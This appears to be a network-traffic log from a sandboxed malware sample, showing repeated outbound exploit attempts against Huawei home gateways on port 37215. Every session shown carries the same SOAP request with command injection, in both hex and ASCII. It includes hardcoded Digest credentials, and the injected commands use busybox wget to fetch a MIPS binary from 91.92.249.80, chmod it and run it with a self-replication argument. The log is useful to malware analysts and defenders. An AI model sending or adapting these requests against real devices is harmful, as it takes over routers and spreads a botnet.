                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          258192.168.2.2348322197.84.54.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156750917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          259192.168.2.2341728197.252.172.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156761885 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          260192.168.2.2336584197.162.0.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156793118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          261192.168.2.2332772147.159.161.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.157136917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          262192.168.2.2337750157.197.216.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175452948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          263192.168.2.234795441.200.247.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175499916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          264192.168.2.2350048203.202.170.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175523996 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          265192.168.2.2342202197.188.6.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175529957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          266192.168.2.2353348157.71.235.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175623894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          267192.168.2.2338540206.3.36.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175641060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
